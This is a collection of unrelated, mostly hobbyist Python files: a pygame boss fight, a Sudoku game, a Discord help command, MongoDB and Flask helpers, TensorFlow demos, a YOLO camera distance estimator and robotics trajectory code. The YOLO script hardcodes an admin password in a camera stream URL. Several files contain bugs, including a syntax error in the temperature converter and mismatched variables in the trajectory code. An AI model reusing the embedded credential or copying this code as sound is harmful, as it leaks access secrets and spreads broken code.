return maximum
def maxSubOn2(arr):
maximum=0
for i in range(n):
subsum=0
for j in range(i,n):
subsum+=arr[j]
maximum=max(maximum,subsum)
return maximum
if __name__ == '__main__':
n=int(input("Enter the size of array:- "))
intArray=[]
print("Enter Element of integer list ")
for i in range(n):
ele=int(input())
intArray.append(ele)
option=input("Enter on2 for O(n^2) and on3 for O(n^3) time complexity Subarray:- ")
if(option=='on2'):
maxsum=maxSubOn2(intArray)
elif(option=='on3'):
maxsum=maxSubOn3(intArray)
print("maximum sum of Subarray is {}".format(maxsum))
|
from Character import Character
from Sprite import AnimatedSprite
from Text import Text
from Player import HPDisplay
import random, pygame
class Spiderboss(Character):
def __init__(self, level):
Character.__init__(self, "spiderboss", level)
self.laser = Laser(self, level.get_camera())
self.level = level
self.wait_ticks = 0
self.state = "idle"
self.HPDisplay = HPDisplay(self, level, offset=[15, 187], color=(255, 220, 220))
self.lock_control = False
def load_resources(self):
Character.load_resources(self)
self.set_speed(1)
self.change_state("idle")
self.change_direction("front")
self.walk_area = self.get_level().get_tile_map().bossarea
self.player = self.get_level().get_player_list()[0]
self.set_speed(15)
self.player_hitted = False
# self.set_unbockable(True)
self.walk_to()
self.add_hitbox(pygame.Rect((96, 228), (151, 23)))
self.add_hitbox(pygame.Rect((63, 197), (218, 33)))
self.add_hitbox(pygame.Rect((44, 164), (253, 33)))
#Patas
self.add_hitbox(pygame.Rect((297, 234), (19, 48)))
self.add_hitbox(pygame.Rect((9, 234), (21, 49)))
#CorpoSuperior
self.add_hitbox(pygame.Rect((38, 84), (265, 81)))
self.set_unbockable(True)
self.dead = False
def logic(self):
Character.logic(self)
if self.lock_control: return
if self.get_hp() <= 0:
self.change_animstate("death")
self.shooting = False
if self.get_actual_frame() == 15:
self.dead = True
if self.dead:
self.change_animstate("deathidle")
return
if self.state == "repell":
self.change_animstate("repell")
if self.get_actual_frame() == self.get_total_frames() - 1:
self.state = "idle"
if self.state == "smash":
self.change_animstate("smash_attack")
if self.get_actual_frame() >= 3:
self.player_hitted = True
if not self.player_hitted:
r = pygame.Rect(self.get_coord()[0], self.get_coord()[1], self.get_rect()[2], self.get_rect()[3])
if self.player.test_collide(r):
self.player.deal_damage(0.2)
if self.get_actual_frame() == 11:
self.player_hitted = False
self.state = "idle"
if self.state == "idle":
self.change_state("idle")
self.wait_ticks += 1
if self.wait_ticks == 120:
print("Reached")
self.wait_ticks = 0
c = pygame.Rect((0,0), (0,0))
c.x = self.player.get_coord()[0]
c.y = self.player.get_coord()[1]
c.width = self.player.get_rect().width
c.height = self.player.get_rect().height
if self.test_collide(c):
self.state = "repell"
if self.player.get_coord()[0] < self.get_coord()[0] + self.get_rect().width/2:
self.player.repell(500, "left")
else:
self.player.repell(500, "right")
self.player.deal_damage(0.21)
else:
self.change_state == "move"
self.walk_to()
if self.state == "eye_attack":
self.change_animstate("eye_attack")
self.laser.logic()
if not self.player_hitted and self.laser.dealing_damage and self.laser.shooting:
for hb in self.laser.get_damage_area():
print(self.player.test_collide(hb))
if self.player.test_collide(hb):
self.player.deal_damage(0.3)
self.player_hitted = True
if self.get_actual_frame() == 11:
self.laser.shoot()
if self.get_actual_frame() == self.get_total_frames() - 1:
self.player_hitted = False
self.state = "idle"
if self.state == "move":
c = pygame.Rect((0,0), (0,0))
c.x = self.player.get_coord()[0]
c.y = self.player.get_coord()[1]
c.width = self.player.get_rect().width
c.height = self.player.get_rect().height
if self.test_collide(c):
self.state = "repell"
if self.player.get_coord()[0] < self.get_coord()[0] + self.get_rect().width/2:
self.player.repell(500, "left")
else:
self.player.repell(500, "right")
self.player.deal_damage(0.21)
if self.get_coord()[0] < self.__dest[0]:
self.walk("right")
self.arrived()
if self.get_coord()[1] < self.__dest[1]:
self.walk("down")
self.arrived()
if self.get_coord()[0] > self.__dest[0]:
self.walk("left")
self.arrived()
if self.get_coord()[1] > self.__dest[1]:
self.walk("up")
self.arrived()
def arrived(self):
if (self.get_coord()[0] >= self.__dest[0] and self.get_coord()[0] <= self.__dest[0] + 50 ) and (self.get_coord()[1] >= self.__dest[1] and self.get_coord()[1] <= self.__dest[1] + 50 ):
self.state = "eye_attack"
self.wait_ticks += 0
print("Changing")
def draw(self, screen):
Character.draw(self, screen)
self.laser.draw(screen)
self.HPDisplay.draw(screen)
def walk_to(self, c=None):
if c:
self.__dest = c
self.state = "walk"
return # if self.ru:
# pygame.draw.rect(screen, (255,255,255), self.ru)
# pygame.draw.rect(screen, (255,255,0), self.rd)
# pygame.draw.rect(screen, (0,255,255), self.rl)
# pygame.draw.rect(screen, (0,0,255), self.rr)
a = self.walk_area
b = self.player.get_coord()[0] - self.get_rect()[2]/2 - 40
print("")
print("Bossarea")
print(a[0] + a[2])
print("Player")
print(b)
print("")
if b >= a[0] and b <= a[0] + a[2]:
print("Target player")
self.__dest = [b, random.randint(a[1], a[1] + a[3])]
else:
self.__dest = [random.randint(a[0], a[0] + a[2]), random.randint(a[1], a[1] + a[3])]
self.state = "move"
class Laser():
def __init__(self, font, camera):
self.font = font
self.laser = AnimatedSprite.load_data("spiderlaser", camera)["shoot"]
self.shooting = False
self.dealing_damage = False
self.hba = pygame.Rect((0, 0), (0,0))
self.hbb = pygame.Rect((0, 0), (0,0))
self.hbc = pygame.Rect((0, 0), (0,0))
self.hbd = pygame.Rect((0, 0), (0,0))
self.hbe = pygame.Rect((0, 0), (0,0))
self.hbf = pygame.Rect((0, 0), (0,0))
self.hbg = pygame.Rect((0, 0), (0,0))
self.hbh = pygame.Rect((0, 0), (0,0))
def shoot(self):
self.shooting = True
self.laser.set_actual_frame(0)
def logic(self):
self.laser.logic()
self.p = [0, 0 ]
if self.laser.get_actual_frame() == self.laser.get_total_frames() - 1:
self.shooting = False
if self.laser.get_actual_frame() >= 0 and self.laser.get_actual_frame() <= 7:
self.dealing_damage = True
else:
self.dealing_damage = False
def get_damage_area(self):
if self.shooting and self.dealing_damage:
r = self.laser.get_rect()
c = [0, 0, 0, 0]
c[0] = self.font.get_coord()[0] - 5
c[1] = self.font.get_coord()[1] + 190
c[2] = r[2]
c[3] = r[3]
hitboxes = []
self.hba = pygame.Rect((c[0] + 30, c[1] + 628), (279, 171))
self.hbb = pygame.Rect((c[0] + 66, c[1] + 482), (211, 147))
self.hbc = pygame.Rect((c[0] + 90, c[1] + 370), (166, 110))
self.hbd = pygame.Rect((c[0] + 109, c[1] + 276), (128, 95))
self.hbe = pygame.Rect((c[0] + 126, c[1] + 181), (92, 101))
self.hbf = pygame.Rect((c[0] + 143, c[1] + 113), (62, 73))
self.hbg = pygame.Rect((c[0] + 155, c[1] + 55), (38, 64))
hitboxes.append(self.hba)
hitboxes.append(self.hbb)
hitboxes.append(self.hbc)
hitboxes.append(self.hbd)
hitboxes.append(self.hbe)
hitboxes.append(self.hbf)
hitboxes.append(self.hbg)
hitboxes.append(self.hbh)
return hitboxes
def draw(self, screen):
if self.shooting:
c = self.font.get_coord()
self.p = [0, 0]
self.p[0] = c[0]
self.p[1] = c[1]
self.p[0] -= 5
self.p[1] += 190
self.laser.draw(self.p, screen, False)
# pygame.draw.rect(screen, (255,255,255), self.hba)
# pygame.draw.rect(screen, (255,255,255), self.hbb)
# pygame.draw.rect(screen, (255,255,255), self.hbc)
# pygame.draw.rect(screen, (255,255,255), self.hbd)
# pygame.draw.rect(screen, (255,255,255), self.hbe)
# pygame.draw.rect(screen, (255,255,255), self.hbf)
# pygame.draw.rect(screen, (255,255,255), self.hbg)
# pygame.draw.rect(screen, (255,255,255), self.hbh)
|
import discord
from configs.configs import Configs
PREFIX = Configs.prefijoBot
COMANDO_ADD = Configs.comandoAdd
COMANDO_REMOVE = Configs.comandoRemove
COMANDO_NEXT = Configs.comandoNext
COMANDO_DELETE = Configs.comandoDelete
COMANDO_LIST = Configs.comandoList
COMANDO_ALL = Configs.comandoAll
COMANDO_CREATE = Configs.comandoCreate
imagenThumbnail = Configs.imagenThumbnail
emojis = Configs.emojis
# Description: Mostrar mensaje de ayuda
# Access: Everyone
async def manejarComandoHelp(channel):
mensajeEmbed = generarMensajeEmbedHelp()
await channel.send(embed=mensajeEmbed)
return True
def generarMensajeEmbedHelp():
# Creacion de mensaje embed
mensajeEmbed = discord.Embed(title="Lista de comandos:",
color=discord.Color.purple())
mensajeEmbed.set_thumbnail(url=imagenThumbnail)
mensajeEmbed.add_field(name="Comandos para Alumnos:",
value=f'''
{PREFIX} {COMANDO_ADD} unaCola | Agregarse a una cola
{PREFIX} {COMANDO_REMOVE} unaCola | Quitarse de una cola
''',
inline=False)
mensajeEmbed.add_field(name="Comandos para Ayudantes:",
value=f'''
{PREFIX} {COMANDO_CREATE} unaCola | Crear una nueva cola
{PREFIX} {COMANDO_DELETE} unaCola | Eliminar una cola
{PREFIX} {COMANDO_NEXT} unaCola | Atender el siguiente en una cola
{PREFIX} {COMANDO_LIST} unaCola | Mostrar estado de la cola
{PREFIX} {COMANDO_ALL} | Mostrar todas las colas existentes
''',
inline=False)
mensajeEmbed.add_field(
name="Emojis:",
value=f"[{emojis[0]}] add | [{emojis[1]}] remove | [{emojis[2]}] next | [{emojis[3]}] delete",
inline=False)
mensajeEmbed.set_footer(
text=
"Tener en cuenta que los mensajes de las colas se actualizan automaticamente una vez enviados."
)
return mensajeEmbed
|
from pymongo import MongoClient
import pymongo
class DBConnection:
connection = MongoClient()
db = connection['local']
def getLastMsgId(self):
collection = self.db['discord_message_lookup']
res = collection.find_one()
return res
def addNewMsg(self, msg_dict):
collection = self.db['discord_message']
doc = collection.insert_one(msg_dict)
return doc.inserted_id
def updateMessageLookup(self, message_id, timestamp):
newvalues = { "$set": { 'message_id': message_id , "timestamp": timestamp} }
collection = self.db['discord_message_lookup']
doc = collection.update({}, newvalues, upsert=True)
return doc
def getLastInsertedMessage(self):
collection = self.db['discord_message']
doc = collection.find_one(sort=[( '_id', pymongo.DESCENDING )])
return doc
|
def strDiag (strInput):
for i in range(len(strInput)):
print(' '*i, strInput[i])
stringInput = input("Enter string: ")
strDiag(stringInput) |
import tensorflow as tf
# demo1
a = tf.constant(3, name='a')
with tf.Session() as sess:
print(sess.run(a))
# demo2
a = tf.constant(3, name='a')
b = tf.constant(4, name='b')
add_op = a + b
with tf.Session() as sess:
print(sess.run(add_op))
# demo3
a = tf.constant([1, 2, 3], name='a')
b = tf.constant([4, 5, 6], name='b')
add_op = a + b
with tf.Session() as sess:
print(sess.run(add_op))
# demo4
a = tf.constant([1, 2, 3], name='a')
b = tf.constant(4, name='b')
add_op = a + b
with tf.Session() as sess:
print(sess.run(add_op))
# demo5
a = tf.constant([[1, 2, 3], [4, 5, 6]], name='a')
b = tf.constant([[1, 2, 3], [4, 5, 6]], name='b')
add_op = a + b
with tf.Session() as sess:
print(sess.run(add_op))
# demo6
a = tf.constant([[1, 2, 3], [4, 5, 6]], name='a')
b = tf.constant(100, name='b')
add_op = a + b
with tf.Session() as sess:
print(sess.run(add_op))
# demo7
a = tf.constant([[1, 2, 3], [4, 5, 6]], name='a')
b = tf.constant([100, 101, 102], name='b')
add_op = a + b
with tf.Session() as sess:
print(sess.run(add_op))
# demo8, not work
# a = tf.constant([[1, 2, 3], [4, 5, 6]], name='a')
# b = tf.constant([100, 101, ], name='b')
# add_op = a + b
# with tf.Session() as sess:
# print(sess.run(add_op))
# demo9
a = tf.constant([[1, 2, 3], [4, 5, 6]], name='a')
b = tf.constant([[100], [101]], name='b')
add_op = a + b
with tf.Session() as sess:
print(sess.run(add_op))
print(a.shape)
print(b.shape)
|
"""
Given an integer array nums, find the contiguous subarray (containing at least one number)
which has the largest sum and return its sum.
Constraints:
1 <= nums.length <= 3 * 104
-105 <= nums[i] <= 105
Follow up: If you have figured out the O(n) solution, try coding another solution using
the divide and conquer approach, which is more subtle.
"""
from typing import List
def max_subarray(nums: List[int]) -> int:
max_sum: int = nums[0]
cur_sum: int = max_sum
for idx in range(1, len(nums)):
cur_sum = max(nums[idx] + cur_sum, nums[idx])
max_sum = max(cur_sum, max_sum)
return max_sum
if __name__ == '__main__':
assert max_subarray([-2, 1, -3, 4, -1, 2, 1, -5, 4]) == 6
assert max_subarray([1]) == 1
assert max_subarray([5, 4, -1, 7, 8]) == 23
|
#You are to write program to convert degrees of Fahrenheit to Celsius.
print("What is the temperature in Fahrenheit?)
Fahrenheit = input ("")
print((float(Fahrenheit)-32)/1.8)
|
import os
def load_config():
mode = os.environ.get('FLASK_ENV', 'default')
if mode == 'production':
from config.production import ProductionConfig
return ProductionConfig
elif mode == 'development':
from config.development import DevelopmentConfig
return DevelopmentConfig
elif mode == 'default':
from config.development import DevelopmentConfig
return DevelopmentConfig
|
#### Imports ####
import sys, os, argparse
########################################################################################################################################################
#### arguments ####
def arguments(arg):
parser = argparse.ArgumentParser()
parser.add_argument("-d","--directory",dest="dir")
parser.add_argument("-k","--kaks",dest="kaks_file")
parser.add_argument("-g","--group_file", dest="group_file")
parser.add_argument("-o","--output",dest="output")
args = parser.parse_args()
if args.dir!=None:
os.chdir(args.dir)
return (args.kaks_file,args.group_file,args.output)
#### read ####
def read(fichier):
try:
f=open(fichier,"r")
except FileNotFoundError as e:
print("Le fichier '",e.filename,"' n'existe pas")
sys.exit(0)
else:
lines=f.readlines()
f.close()
return lines
#### comp ####
def comp(kaks,groups):
res=[]
for i in range(0,len(groups)):
line_groups=groups[i].split()
for j in range(0,len(kaks)):
line_kaks=kaks[j].split()
if line_groups[0] == line_kaks[0] and line_groups[1] == line_kaks[1]:
res.append(groups[i].strip()+"\t"+line_kaks[7])
return res
#### save ####
## Sauvegarde du fichier
def save(arg,out):
## Attribution de valeur par défaut à l'output
if out == None:
out="positive_selection_pairs_with_expression_pattern"
try:
f=open(out,"r")
except FileNotFoundError:
f=open(out,"w")
for ele in arg:
f.write(ele+"\n")
f.close()
else:
print("Attention, ce fichier "+out+" existe déjà\nFermeture du programme\n")
sys.exit(0)
print("Le fichier s'appellera "+out)
|
import pygame
import ctypes # for pop-up window
from random import shuffle, randint # for shuffling and generating random iterger
from pprint import pprint # to print girid in terminal from 1-D array to 2-D array
sudokuGrid = [[0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0]]
def completeCheck(sudokuGrid):
for row in range(0, 9):
for col in range(0, 9):
if sudokuGrid[row][col] == 0:
return False
return True
ordNumList = [1, 2, 3, 4, 5, 6, 7, 8, 9]
def fillsudokuGrid(sudokuGrid):
# Find next empty cell
for i in range(0, 81):
row = i // 9 # 76 > 76//9 == 8 (stays same)
col = i % 9 # 76> 76%9 == 4 then goes to 5 then 6 then 7 then 8...
if sudokuGrid[row][col] == 0:
shuffle(ordNumList)
for value in ordNumList:
# Check that this value has not already be used on this row
if not (value in sudokuGrid[row]):
# Check that this value has not already be used on this column
if not value in (
sudokuGrid[0][col], sudokuGrid[1][col], sudokuGrid[2][col], sudokuGrid[3][col],
sudokuGrid[4][col], sudokuGrid[5][col], sudokuGrid[6][col],
sudokuGrid[7][col], sudokuGrid[8][col]):
# Identify which of the 9 squares we are working on
square = []
if row < 3:
if col < 3:
square = [sudokuGrid[i][0:3] for i in range(0, 3)]
elif col < 6:
square = [sudokuGrid[i][3:6] for i in range(0, 3)]
else:
square = [sudokuGrid[i][6:9] for i in range(0, 3)]
elif row < 6:
if col < 3:
square = [sudokuGrid[i][0:3] for i in range(3, 6)]
elif col < 6:
square = [sudokuGrid[i][3:6] for i in range(3, 6)]
else:
square = [sudokuGrid[i][6:9] for i in range(3, 6)]
else:
if col < 3:
square = [sudokuGrid[i][0:3] for i in range(6, 9)]
elif col < 6:
square = [sudokuGrid[i][3:6] for i in range(6, 9)]
else:
square = [sudokuGrid[i][6:9] for i in range(6, 9)]
# Check that this value has not already be used on this 3x3 square
if not value in (square[0] + square[1] + square[2]):
sudokuGrid[row][col] = value
if completeCheck(sudokuGrid):
return True
else:
if fillsudokuGrid(sudokuGrid):
return True
break
sudokuGrid[row][col] = 0
# Generate a Fully Solved sudokuGrid
fillsudokuGrid(sudokuGrid)
pprint(sudokuGrid)
grid = [i.copy() for i in sudokuGrid]
def removek(k):
while k:
row = randint(0, 8)
col = randint(0, 8)
if grid[row][col] != 0:
grid[row][col] = 0
k = k - 1
defaultLevel = 1
level = defaultLevel
def levelSelect(level):
if level == 1:
removek(3)
elif level == 2: # easy difficulty
removek(10)
elif level == 3: # meduim difficulty
removek(20)
elif level == 4: # hard difficulty
removek(30)
WIDTH = 550 # width of game window
HEIGHT = 700 # height of game window
background_color = (255, 255, 255) # background colour of game window
#################################
def levelSelectwindow():
pygame.init()
lswin = pygame.display.set_mode((WIDTH, HEIGHT)) # forming window
pygame.display.set_caption("SUDOKU") # assigning caption to window
lswin.fill(background_color) # giving colour to window
lfont = pygame.font.SysFont('Comic Sans MS', 15)
levelchoose = lfont.render('Choose Difficulty Level: ', True, (0, 0, 0))
level1 = lfont.render('Quick Test', True, (0, 0, 0))
level2 = lfont.render('Easy', True, (0, 0, 0))
level3 = lfont.render('Medium', True, (0, 0, 0))
level4 = lfont.render('Hard', True, (0, 0, 0))
lswin.blit(levelchoose, (200 + 10, 50 + 10))
pygame.draw.rect(lswin, (255,255,0), [200, 150, 200, 50])
lswin.blit(level1, (225 + 35, 150 + 10))
pygame.draw.rect(lswin, (0,255,0), [200, 250, 200, 50])
lswin.blit(level2, (225 + 35, 250 + 10))
pygame.draw.rect(lswin, (0,255,255), [200, 350, 200, 50])
lswin.blit(level3, (225 + 35, 350 + 10))
pygame.draw.rect(lswin, (255,0,0), [200, 450, 200, 50])
lswin.blit(level4, (225 + 35, 450 + 10))
pygame.display.update()
lselectmenu = 1
while lselectmenu == 1:
for event in pygame.event.get():
if event.type == pygame.QUIT: # close the window
pygame.quit()
return
mposefLevelSelection = pygame.mouse.get_pos()
if event.type == pygame.MOUSEBUTTONDOWN:
if 200 <= mposefLevelSelection[0] <= 400 and 150 <= mposefLevelSelection[1] <= 200:
levelSelect(1)
return
if 200 <= mposefLevelSelection[0] <= 400 and 250 <= mposefLevelSelection[1] <= 300:
levelSelect(2)
return
if 200 <= mposefLevelSelection[0] <= 400 and 350 <= mposefLevelSelection[1] <= 400:
levelSelect(3)
return
if 200 <= mposefLevelSelection[0] <= 400 and 450 <= mposefLevelSelection[1] <= 500:
levelSelect(4)
return
##################################
levelSelectwindow()
original_grid_element_color = (52, 31, 151) # color of number generated by default
buffer = 5 # constant value to make sudoku attractive
grid_original = [[grid[x][y] for y in range(len(grid[0]))] for x in
range(len(grid))] # copy of original grid - formed for checking the solution at last
# this function is created for inserting the input by the user in the grid
def insert(win, position):
i, j = position[1], position[0] # we will use i and j to made the update in grid variable
myfont = pygame.font.SysFont('Comic Sans MS',
35) # font of input given by the user and also used for default populated grid
while True:
for event in pygame.event.get(): # event which we are going to do
if event.type == pygame.QUIT: # closing game window
return
if event.type == pygame.KEYDOWN: # keyboard button is pressed
if grid_original[i - 1][j - 1] != 0: # means there is already some number on the grid . i.e original grid element is not empty
return
if event.key == 48: # if key = 0 bcz 48 is the ASCII value of 0
grid[i - 1][j - 1] = event.key - 48 # to update the grid variable
pygame.draw.rect(win, background_color, (
position[0] * 50 + buffer, position[1] * 50 + 2 * buffer, 50 - 3 * buffer,
50 - 3 * buffer)) # function is used to draw a rectangle
pygame.display.update() # to update the changes we have made
if 0 < event.key - 48 < 10: # if key = [1,9]
grid[i - 1][j - 1] = event.key - 48 # to update the grid variable
value = myfont.render(str(event.key - 48), True,
(0, 0, 255)) # render is used to make object of text
win.blit(value, (
position[0] * 50 + 15, position[1] * 50 + 5)) # blit is used to print object on the window
pygame.display.update()
return
return
def main():
pygame.init() # initialising pygame
win = pygame.display.set_mode((WIDTH, HEIGHT)) # forming window
pygame.display.set_caption("SUDOKU") # assigning caption to window
win.fill(background_color) # giving colour to window
myfont = pygame.font.SysFont('Comic Sans MS', 24) # font for populating the grid
solnfont = pygame.font.SysFont('Comic Sans MS', 15) # font for printing CheckSolution term on screen
checkSolntext = solnfont.render('Check Solution', True, (0, 0, 0)) # rendering CheckSolution
for i in range(0, 10):
if i % 3 == 0:
pygame.draw.line(win, (0, 0, 0), (50 + 50 * i, 50), (50 + 50 * i, 500), 4) # darker vertical line
pygame.draw.line(win, (0, 0, 0), (50, 50 + 50 * i), (500, 50 + 50 * i), 4) # darker horizontal line
pygame.draw.line(win, (0, 0, 0), (50 + 50 * i, 50), (50 + 50 * i, 500), 1) # lighter vertical line
pygame.draw.line(win, (0, 0, 0), (50, 50 + 50 * i), (500, 50 + 50 * i), 1) # lighter horizontal line
pygame.display.update()
pygame.draw.rect(win, (255, 199, 189), [225, 600, 125, 40]) # rectangle for CheckSolution term
win.blit(checkSolntext, (225 + 15, 600 + 10)) # blitting checkSolution on screen
pygame.display.update()
for i in range(0, len(grid[0])): # this whole for loop is for populating grid with numbers
for j in range(0, len(grid[0])):
if 0 < grid[i][j] < 10:
value = myfont.render(str(grid[i][j]), True, (0, 0, 0))
win.blit(value, ((j + 1) * 50 + 10, (i + 1) * 50 + 10))
pygame.display.update()
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT: # close the window
pygame.quit()
return
if event.type == pygame.MOUSEBUTTONUP and event.button == 1: # mousebuttonup means mouse button release after pressing and left click (1 means)
pos = pygame.mouse.get_pos() # getting position of mouse
insert(win, (pos[0] // 50, pos[1] // 50)) # on dividing by 50 to get the grid indices
if event.type == pygame.MOUSEBUTTONDOWN: # means mouse button pressed and it can be any click . it is used for clicking on checksolution term
mousepos = pygame.mouse.get_pos() # getting position of click
if 225 <= mousepos[0] <= 365 and 600 <= mousepos[1] <= 650:
# this whole function is used to checking the answer and then printing the result on pop-up window. i.e whether we are correct or wrong
if grid != sudokuGrid:
pprint(grid)
pprint(sudokuGrid)
ctypes.windll.user32.MessageBoxW(0, "Mission Failed, we'll get em next time", "OHHH NO!",
1) # ctype is used for pop window
elif grid == sudokuGrid:
pprint(grid)
pprint(sudokuGrid)
ctypes.windll.user32.MessageBoxW(0, "You Won!!!", "CONGRATULATIONS", 1)
main()
|
from com.ml.objects.Detection import ObjectDetection
from com.ml.utils.distance import Distance
import numpy as np
import os
import cv2
# initialize the known distance from the camera to the object, which
# in this case is 24 inches
KNOWN_DISTANCE = 24.0
# initialize the known object width, which in this case, the piece of
# paper is 12 inches wide
KNOWN_WIDTH = 11.0
camera = cv2.VideoCapture("rtsp://admin:Digitalab_123@192.168.0.21")
detector = ObjectDetection()
detector.setModelTypeAsYOLOv3()
detector.setModelPath(os.path.join(os.getcwd(), "../ml-data-set/yolo.h5"))
detector.loadModel()
firstImage = ""
while True:
ret, frame = camera.read()
cacheImagePath = "../cache/cache.jpg"
cv2.imwrite(cacheImagePath, cv2.cvtColor(frame, cv2.COLOR_RGB2BGR))
detected_copy, output_objects_array = detector.detectObjectsFromImage(input_image=cacheImagePath, input_type='file',
output_type='array',
minimum_percentage_probability=30)
if len(output_objects_array) > 0:
if(firstImage ==""):
firstImage = frame
marker = Distance.find_marker(firstImage)
focalLength = (marker[1][0] * KNOWN_DISTANCE) / KNOWN_WIDTH
else:
marker = Distance.find_marker(detected_copy)
inches = Distance.distance_to_camera(KNOWN_WIDTH, focalLength, marker[1][0])
box = np.int0(cv2.boxPoints(marker))
cv2.drawContours(detected_copy, [box], -1, (0, 255, 0), 2)
cv2.putText(detected_copy, "%.2fft" % (inches / 12),
(detected_copy.shape[1] - 200, detected_copy.shape[0] - 20), cv2.FONT_HERSHEY_SIMPLEX,
2.0, (0, 255, 0), 3)
cv2.imshow("image", detected_copy)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# # Release video
camera.release()
cv2.destroyAllWindows()
|
from linear import matrix
import latex
import robotics
from sympy import symbols
import math
def insert(A,t):
temp = A.copy()
for i in range(A.n):
for j in range(A.m):
temp[i][j] = A[i][j].subs('t', t)
return temp
def solveABC(A, b):
q = []
for i in range(len(b)):
temp = [b[i], 0, 0]
abc = A**-1 * matrix([[i] for i in temp])
abc = [abc[0][0], abc[1][0], abc[2][0]]
q.append(abc)
return q
def p4():
t = symbols('t')
A = matrix([[t**5, t**4, t**3],[5*t**4, 4*t**3, 3*t**2],[20*t**3, 12*t**2, 6*t]])
A0 = insert(A,0)
print(A0)
A2 = insert(A,2)
print(A2)
first = [-0.321750554396642, -4.49454236888801 + 2*math.pi, 1.61941347407016, 2.92374604209311]
abc1 = solveABC(A2, first)
dof = 4
count = 1
for i in range(len(abc1)):
eq = "q{}{} = {}t^5 + {}t^4 + {}t^3 + {}\n".format(count, i+1, round(abc1[i][0], dof),round(abc1[i][1], dof),round(abc1[i][2], dof), round(first[i], dof))
#eq += "dq{}{}/dt = {}t^4 + {}t^3 + {}t^2\n".format(count, i+1, round(5*abc1[i][0], dof),round(4*abc1[i][1],dof),round(3*abc1[i][2], dof))
#eq += "d2q{}{}/dt2 = {}t^3 + {}t^2 + {}t\n".format(count, i+1, round(20*abc1[i][0], dof),round(12*abc1[i][1], dof), round(6*abc1[i][2]))
print(eq)
count = 2
second = [0.26396372362570, -4.53174363933971 + 2*math.pi, 1.94807597387782, 2.96094731254482]
abc1 = solveABC(A2, first)
for i in range(len(abc1)):
eq = "q{}{} = {}t^5 + {}t^4 + {}t^3 + {}\n".format(count, i+1, round(abc1[i][0], dof),round(abc1[i][1], dof),round(abc1[i][2], dof), round(first[i], dof))
#eq += "dq{}{}/dt = {}t^4 + {}t^3 + {}t^2\n".format(count, i+1, round(5*abc1[i][0], dof),round(4*abc1[i][1],dof),round(3*abc1[i][2], dof))
#eq += "d2q{}{}/dt2 = {}t^3 + {}t^2 + {}t\n".format(count, i+1, round(20*abc1[i][0], dof),round(12*abc1[i][1], dof), round(6*abc1[i][2]))
print(eq)
count = 3
third = [-0.223476601140633, -4.55848107238232 + 2*math.pi, 2.28309001136617, 2.98768474558743]
abc1 = solveABC(A2, second)
for i in range(len(abc1)):
eq = "q{}{} = {}t^5 + {}t^4 + {}t^3 + {}\n".format(count, i+1, round(abc1[i][0], dof),round(abc1[i][1], dof),round(abc1[i][2], dof), round(second[i], dof))
#eq += "dq{}{}/dt = {}t^4 + {}t^3 + {}t^2\n".format(count, i+1, round(5*abc1[i][0], dof),round(4*abc1[i][1],dof),round(3*abc1[i][2], dof))
#eq += "d2q{}{}/dt2 = {}t^3 + {}t^2 + {}t\n".format(count, i+1, round(20*abc1[i][0], dof),round(12*abc1[i][1], dof), round(6*abc1[i][2]))
print(eq)
count = 4
fourth = [0.193621992855945, -4.57850459598843 + 2*math.pi, 2.62202212042538, 3.00770826919353]
abc1 = solveABC(A2, third)
for i in range(len(abc1)):
eq = "q{}{} = {}t^5 + {}t^4 + {}t^3 + {}\n".format(count, i+1, round(abc1[i][0], dof),round(abc1[i][1], dof),round(abc1[i][2], dof), round(third[i], dof))
#eq += "dq{}{}/dt = {}t^4 + {}t^3 + {}t^2\n".format(count, i+1, round(5*abc1[i][0], dof),round(4*abc1[i][1],dof),round(3*abc1[i][2], dof))
#eq += "d2q{}{}/dt2 = {}t^3 + {}t^2 + {}t\n".format(count, i+1, round(20*abc1[i][0], dof),round(12*abc1[i][1], dof), round(6*abc1[i][2]))
print(eq)
count = 5
fifth = [-0.170735211475283, -4.59401022420542 + 2*math.pi, 2.96352830254749, 3.02321389741052]
abc1 = solveABC(A2, fourth)
for i in range(len(abc1)):
eq = "q{}{} = {}t^5 + {}t^4 + {}t^3 + {}\n".format(count, i+1, round(abc1[i][0], dof),round(abc1[i][1], dof),round(abc1[i][2], dof), round(fourth[i], dof))
#eq += "dq{}{}/dt = {}t^4 + {}t^3 + {}t^2\n".format(count, i+1, round(5*abc1[i][0], dof),round(4*abc1[i][1],dof),round(3*abc1[i][2], dof))
#eq += "d2q{}{}/dt2 = {}t^3 + {}t^2 + {}t\n".format(count, i+1, round(20*abc1[i][0], dof),round(12*abc1[i][1], dof), round(6*abc1[i][2]))
print(eq)
def p5():
t = symbols('t')
A = matrix([[t ** 5, t ** 4, t ** 3], [5 * t ** 4, 4 * t ** 3, 3 * t ** 2], [20 * t ** 3, 12 * t ** 2, 6 * t]])
A0 = insert(A, 0)
A2 = insert(A, 2)
points = [[-0.321750554396642, -4.49454236888801 + 2 * math.pi, 1.61941347407016, 2.92374604209311],
[0.26396372362570, -4.53174363933971 + 2 * math.pi, 1.94807597387782, 2.96094731254482],
[-0.223476601140633, -4.55848107238232 + 2 * math.pi, 2.28309001136617, 2.98768474558743],
[0.193621992855945, -4.57850459598843 + 2 * math.pi, 2.62202212042538, 3.00770826919353],
[-0.170735211475283, -4.59401022420542 + 2 * math.pi, 2.96352830254749, 3.02321389741052]]
man = robotics.manipulator()
man.addlink()
man.addlink()
man.addlink()
man.addlink()
J4 = man.H2()
B = robotics.insert(J4, a=[0, 0, 0, 1.15], th=[None, None, math.pi, None],
al=[-math.pi / 2, math.pi / 2, math.pi / 2, math.pi / 2], d=[1.7, 0, None, 0])
B = [B[0][-1], B[1][-1]]
A = matrix(5, 2)
for i in range(len(points)):
t1 = B[0].subs('th1',points[i][0]).subs('th2',points[i][1]).subs('d3',points[i][2]).subs('th4',points[i][3])
t2 = B[1].subs('th1',points[i][0]).subs('th2',points[i][1]).subs('d3',points[i][2]).subs('th4',points[i][3])
A[i][0] = round(t1, 3)
A[i][1] = round(t2, 3)
ini = [i for i in A[:-1]]
fin = [i for i in A[1:]]
